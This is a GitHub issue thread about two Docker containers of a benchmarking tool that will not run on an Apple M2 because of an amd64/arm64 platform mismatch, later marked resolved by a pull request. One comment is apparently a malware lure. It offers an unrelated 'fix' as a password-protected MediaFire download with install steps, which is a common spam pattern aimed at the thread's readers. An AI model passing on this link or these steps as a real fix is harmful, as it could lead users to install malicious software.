### ISSUE TITLE
`reporter` and `monitor-traffic-tcpdump` containers are not running on apple M2 pro

### ISSUE THREAD

**Issue by GitGab19** [stratum-mining/benchmarking-tool#48]
When the tool is run on a mac M2, we get these errors:

```
 ! reporter The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm64/v8) and no specific platform was requested                0.0s
 ! monitor-traffic-tcpdump The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm64/v8) and no specific platform was requested 0.0s
```

Discussion: https://discord.com/channels/950687892169195530/1276551983783739443

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Shourya742** [comment]
Resolved in: https://github.com/stratum-mining/benchmarking-tool/pull/49
